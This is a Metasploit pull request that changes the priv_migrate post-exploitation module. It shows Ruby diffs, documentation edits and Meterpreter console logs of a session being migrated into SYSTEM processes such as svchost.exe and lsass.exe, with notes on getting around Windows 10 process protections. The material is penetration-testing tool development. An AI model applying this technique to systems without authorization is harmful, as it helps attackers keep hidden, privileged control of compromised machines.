### PR TITLE
Fix #8035 and priv_migrate improvements

### DIFF
--- a/documentation/modules/post/windows/manage/priv_migrate.md
+++ b/documentation/modules/post/windows/manage/priv_migrate.md
@@ -14,6 +14,7 @@ This module is a nice addition to the beginning of an autorun script for post-Me
 - **ANAME** - This option allows you to specify a system level process that the module attempts to migrate to first if the session has admin rights. 
 - **NAME** - This option allows you to specify the user level process that the module attempts to migrate to first if the session has user rights or if admin migration fails through all of the default processes.  
 - **KILL** - This option allows you to kill the original process after a successful migration. The default value is FALSE.
+- **NOFAIL** - This option allows you to specify whether or not the module will migrate the session into a user level process if admin level migration fails. If TRUE, this may downgrade priviliged shells. The default value is FALSE.
 
 ## Module Process
 Here is the process that the module follows:
@@ -22,11 +23,13 @@ Here is the process that the module follows:
 - If the session has admin rights, it attempts to migrate to a system owned process in the following order:
     - ANAME (Module option, if specified)
     - services.exe
-    - winlogon.exe
     - wininit.exe
+    - svchost.exe
     - lsm.exe
     - lsass.exe
-- If it is unable to migrate to one of these processes, it drops to user level migration.
+    - winlogon.exe
+- The module will not migrate if the session has System rights and is already in one of the above target processes.
+- If it is unable to migrate to one of these processes, it drops to user level migration if NOFAIL is TRUE.
 - If the session has user rights, it attempts to migrate to a user owned process in the following order:  
     - NAME (Module option, if specified)
     - explorer.exe

--- a/modules/post/windows/manage/priv_migrate.rb
+++ b/modules/post/windows/manage/priv_migrate.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Post
   def run
     # Get current process information
     @original_pid  = client.sys.process.open.pid
-    @original_name = client.sys.process.open.name
+    @original_name = client.sys.process.open.name.downcase
     print_status("Current session process is #{@original_name} (#{@original_pid}) as: #{client.sys.config.getuid}")
     unless migrate_admin
       if is_admin? && !datastore['NOFAIL']
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Post
   def get_pid(proc_name)
     processes = client.sys.process.get_processes
     processes.each do |proc|
-      if proc['name'] == proc_name && proc['user'] != ""
+      if proc['name'].downcase == proc_name && proc['user'] != ""
         return proc['pid']
       end
     end
@@ -127,9 +127,10 @@ class MetasploitModule < Msf::Post
   # @return [FalseClass] if it failed to migrate
   def migrate_admin
     if is_admin?
-      # Populate target array
+      # Populate target array and Downcase all Targets
       admin_targets = DEFAULT_ADMIN_TARGETS.dup
       admin_targets.unshift(datastore['ANAME']) if datastore['ANAME']
+      admin_targets.map!(&:downcase)
 
       if is_system?
         print_status("Session is already Admin and System.")
@@ -157,9 +158,11 @@ class MetasploitModule < Msf::Post
   # @return [TrueClass] if it successfully migrated
   # @return [FalseClass] if it failed to migrate
   def migrate_user
-    # Populate Target Array
+    # Populate Target Array and Downcase all Targets
     user_targets = DEFAULT_USER_TARGETS.dup
     user_targets.unshift(datastore['NAME']) if datastore['NAME']
+    user_targets.map!(&:downcase)
+
     print_status("Will attempt to migrate to a User level process.")
 
     # Try to migrate to user level processes in the list.  If it does not exist or cannot migrate, try spawning it then migrating.

--- a/modules/post/windows/manage/priv_migrate.rb
+++ b/modules/post/windows/manage/priv_migrate.rb
@@ -36,9 +36,10 @@ class MetasploitModule < Msf::Post
 
     register_options(
       [
-        OptString.new('ANAME', [false, 'System process to migrate to. For sessions with Admin rights. (See Module Description.)']),
-        OptString.new('NAME',  [false, 'Process to migrate to. For sessions with User rights. (See Module Description.)']),
-        OptBool.new(  'KILL',  [false, 'Kill original session process.', false])
+        OptString.new('ANAME',  [false, 'System process to migrate to. For sessions with Admin rights. (See Module Description.)']),
+        OptString.new('NAME',   [false, 'Process to migrate to. For sessions with User rights. (See Module Description.)']),
+        OptBool.new(  'KILL',   [true, 'Kill original session process.', false]),
+        OptBool.new(  'NOFAIL', [true,  'Migrate to user level process if Admin migration fails. May downgrade privileged shells.', false])
       ], self.class)
   end
 
@@ -48,6 +49,7 @@ class MetasploitModule < Msf::Post
     @original_name = client.sys.process.open.name
     print_status("Current session process is #{@original_name} (#{@original_pid}) as: #{client.sys.config.getuid}")
     unless migrate_admin
+      return if is_admin? && datastore['NOFAIL']
       migrate_user
     end
   end

--- a/modules/post/windows/manage/priv_migrate.rb
+++ b/modules/post/windows/manage/priv_migrate.rb
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Post
 
   include Msf::Post::Windows::Priv
 
-  DEFAULT_ADMIN_TARGETS = [ 'services.exe', 'winlogon.exe', 'wininit.exe', 'lsm.exe', 'lsass.exe' ]
+  DEFAULT_ADMIN_TARGETS = [ 'services.exe', 'wininit.exe', 'svchost.exe', 'lsm.exe', 'lsass.exe', 'winlogon.exe' ]
   DEFAULT_USER_TARGETS  = [ 'explorer.exe', 'notepad.exe' ]
 
   def initialize(info={})
@@ -19,8 +19,8 @@ class MetasploitModule < Msf::Post
       'Description'   => %q{ This module will migrate a Meterpreter session based on session privileges.
          It will do everything it can to migrate, including spawing a new User level process.
          For sessions with Admin rights: It will try to migrate into a System level process in the following
-         order: ANAME (if specified), services.exe, winlogon.exe, wininit.exe, lsm.exe, and lsass.exe.
-         If all these fail, it will fall back to User level migration. For sessions with User level rights:
+         order: ANAME (if specified), services.exe, wininit.exe, svchost.exe, lsm.exe, lsass.exe, and winlogon.exe.
+         If all these fail and NOFAIL is set to true, it will fall back to User level migration. For sessions with User level rights:
          It will try to migrate to a user level process, if that fails it will attempt to spawn the process
          then migrate to it. It will attempt the User level processes in the following order:
          NAME (if specified), explorer.exe, then notepad.exe.},
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Post
         OptString.new('ANAME',  [false, 'System process to migrate to. For sessions with Admin rights. (See Module Description.)']),
         OptString.new('NAME',   [false, 'Process to migrate to. For sessions with User rights. (See Module Description.)']),
         OptBool.new(  'KILL',   [true, 'Kill original session process.', false]),
-        OptBool.new(  'NOFAIL', [true,  'Migrate to user level process if Admin migration fails. May downgrade privileged shells.', false])
+        OptBool.new(  'NOFAIL', [true,  'Migrate to user level process if Admin migration fails. May downgrade privileged shells.', true])
       ], self.class)
   end
 

--- a/modules/post/windows/manage/priv_migrate.rb
+++ b/modules/post/windows/manage/priv_migrate.rb
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Post
       'License'       => MSF_LICENSE,
       'Author'        =>
         [
-          'Josh Hale <jhale85446[at]gmail.com>',
+          'Josh Hale "sn0wfa11" <jhale85446[at]gmail.com>',
           'theLightCosine'
         ],
       'Platform'      => ['win' ],

--- a/modules/post/windows/manage/priv_migrate.rb
+++ b/modules/post/windows/manage/priv_migrate.rb
@@ -107,9 +107,13 @@ class MetasploitModule < Msf::Post
       client.core.migrate(target_pid)
       print_good("Successfully migrated to #{client.sys.process.open.name} (#{client.sys.process.open.pid}) as: #{client.sys.config.getuid}")
       return true
-    rescue ::Rex::Post::Meterpreter::RequestError => error
+    rescue ::Rex::Post::Meterpreter::RequestError => req_error
       print_error("Could not migrate to #{proc_name}.")
-      print_error(error.to_s)
+      print_error(req_error.to_s)
+      return false
+    rescue ::Rex::RuntimeError => run_error
+      print_error("Could not migrate to #{proc_name}.")
+      print_error(run_error.to_s)
       return false
     end
   end

--- a/modules/post/windows/manage/priv_migrate.rb
+++ b/modules/post/windows/manage/priv_migrate.rb
@@ -134,6 +134,10 @@ class MetasploitModule < Msf::Post
 
       if is_system?
         print_status("Session is already Admin and System.")
+        if admin_targets.include? @original_name
+          print_good("Session is already in target process: #{@original_name}.")
+          return true
+        end
       else
         print_status("Session is Admin but not System.")
       end

--- a/modules/post/windows/manage/priv_migrate.rb
+++ b/modules/post/windows/manage/priv_migrate.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Post
         OptString.new('ANAME',  [false, 'System process to migrate to. For sessions with Admin rights. (See Module Description.)']),
         OptString.new('NAME',   [false, 'Process to migrate to. For sessions with User rights. (See Module Description.)']),
         OptBool.new(  'KILL',   [true, 'Kill original session process.', false]),
-        OptBool.new(  'NOFAIL', [true,  'Migrate to user level process if Admin migration fails. May downgrade privileged shells.', true])
+        OptBool.new(  'NOFAIL', [true,  'Migrate to user level process if Admin migration fails. May downgrade privileged shells.', false])
       ], self.class)
   end
 

--- a/modules/post/windows/manage/priv_migrate.rb
+++ b/modules/post/windows/manage/priv_migrate.rb
@@ -49,7 +49,10 @@ class MetasploitModule < Msf::Post
     @original_name = client.sys.process.open.name
     print_status("Current session process is #{@original_name} (#{@original_pid}) as: #{client.sys.config.getuid}")
     unless migrate_admin
-      return if is_admin? && datastore['NOFAIL']
+      if is_admin? && !datastore['NOFAIL']
+        print_status("NOFAIL set to false, exiting module.")
+        return
+      end
       migrate_user
     end
   end


### PR DESCRIPTION
# Overview

With PR #8004 making post/windows/manage/priv_migrate the default action for Meterpreter's "migrate -f", I wanted to address some issues (Issue #8035) and provide a few improvements.

## Changes to this module
- Add an additional error handler into the migrate function. This prevents the module from crashing when it cannot migrate into a spawned user level process. This is part of #8035 and can occur with Windows Vista.
- Check to see if the session is both Admin and System, then check if it is already in one of the target System processes. If this is the case, the module will exit instead of trying to migrate. I do not see any need to have the module migrate into another System level process when it is already there. The original goal of this module was to move from Admin to System. This also helps address #8035.
- Downcase matching of process names. This helps with the above check and also prevents issues in the future if case were to become an issue in checking process names.
- Add a module option called "NOFAIL". When FALSE the module will stop if Admin level migration fails. When TRUE it will migrate to a user level process if Admin level migration fails. This option, when FALSE, prevents the downgrading of privileged shells. (More on this below).
- The addition of "svchost.exe" to the System target list, and the movement of "winlogon.exe" to the end of the list. In Windows 10, Microsoft has started to add some protections for System level processes. "services.exe" and "wininit.exe" are no longer available for migration in Win 10. Additionally, Microsoft has started to add some protections for "winlogon.exe" where migrating into that process may lock the computer until reboot, or the migration may fail and cause the original process to crash as it currently does in Windows Insider build 15014. "svchost.exe" has worked very well for Windows 10 System level migration.
- Update module documentation to reflect the changes.

### NOFAIL Default setting
Currently, I have NOFAIL defaulting to FALSE to prevent the downgrading privileged shells. However, I'm looking for input from others on the default value for this option. @dmaloney-r7 and @wchen-r7, do either of you have any thoughts on this?

## Verification

- [x] Use the setup from #8035 and ensure that the error handling is operating correctly.
- [x] Ensure that migration does not occur when the session is already in one of the System target processes.
- [x] Test if NOFAIL=FALSE stops migration to a User level process if Admin level migration fails. (Easiest way to test is to use the Vista setup from the Issue description and comment out the "return true" on line 139)
- [x] Get an Admin Meterpreter session on Windows 10. Run the module and ensure that it migrates to a System level process properly with no errors on the Windows machine. Should go into "svchost.exe".

## Example outputs
### Error Handler Fix
```
[*] Meterpreter session 1 opened (10.8.0.66:13007 -> 192.168.1.218:49173) at 2017-02-28 21:00:10 -0600
[*] Session ID 1 (10.8.0.66:13007 -> 192.168.1.218:49173) processing AutoRunScript 'multi_console_command -rc /root/Desktop/migrate.rc'
[*] Running Command List ...
[*] 	Running command run post/windows/manage/priv_migrate
[*] Current session process is iexplore.exe (804) as: WIN-0HORFV9LBZO\Josh
[*] Session has User level rights.
[*] Will attempt to migrate to a User level process.
[-] Could not migrate to explorer.exe.
[*] Attempting to spawn explorer.exe
[+] Successfully spawned explorer.exe
[*] Trying explorer.exe (3788)
[-] Could not migrate to explorer.exe.
[-] Cannot migrate into non existent process
[-] Could not migrate to notepad.exe.
[*] Attempting to spawn notepad.exe
[+] Successfully spawned notepad.exe
[*] Trying notepad.exe (3880)
[+] Successfully migrated to notepad.exe (3880) as: WIN-0HORFV9LBZO\Josh
```

### No Migrate if Already in a Target System Process
```
[*] Meterpreter session 2 opened (10.8.0.66:13007 -> 192.168.1.218:49185) at 2017-02-28 21:07:56 -0600
[*] Session ID 2 (10.8.0.66:13007 -> 192.168.1.218:49185) processing AutoRunScript 'multi_console_command -rc /root/Desktop/migrate.rc'
[*] Running Command List ...
[*] 	Running command run post/windows/manage/priv_migrate
[*] Current session process is lsass.exe (692) as: NT AUTHORITY\SYSTEM
[*] Session is already Admin and System.
[+] Session is already in target process: lsass.exe.
```

### NOFAIL=FALSE - Don't downgrade privileged shell
```
[*] Meterpreter session 2 opened (10.8.0.66:13007 -> 192.168.1.218:49176) at 2017-02-28 21:12:41 -0600
[*] Session ID 2 (10.8.0.66:13007 -> 192.168.1.218:49176) processing AutoRunScript 'multi_console_command -rc /root/Desktop/migrate.rc'
[*] Running Command List ...
[*] 	Running command run post/windows/manage/priv_migrate
[*] Current session process is lsass.exe (692) as: NT AUTHORITY\SYSTEM
[*] Session is already Admin and System.
[*] Will attempt to migrate to specified System level process.
[*] Trying services.exe (640)
[-] Could not migrate to services.exe.
[-] stdapi_sys_config_getuid: Operation failed: 1722
[-] Could not migrate to wininit.exe.
[-] Could not migrate to svchost.exe.
[-] Could not migrate to lsm.exe.
[-] Could not migrate to lsass.exe.
[-] Could not migrate to winlogon.exe.
[-] Unable to migrate to any of the System level processes.
[*] NOFAIL set to false, exiting module.
```

### Windows 10 - Admin Migration
```
[*] Meterpreter session 2 opened (10.8.0.66:13008 -> 192.168.1.1:53245) at 2017-02-28 21:28:10 -0600
[*] Session ID 2 (10.8.0.66:13008 -> 192.168.1.1:53245) processing AutoRunScript 'multi_console_command -rc /root/Desktop/migrate.rc'
[*] Running Command List ...
[*] 	Running command run post/windows/manage/priv_migrate
[*] Current session process is powershell.exe (164) as: RAPTOR\User
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[-] Could not migrate to services.exe.
[-] Could not migrate to wininit.exe.
[*] Trying svchost.exe (740)
[+] Successfully migrated to svchost.exe (740) as: NT AUTHORITY\SYSTEM
```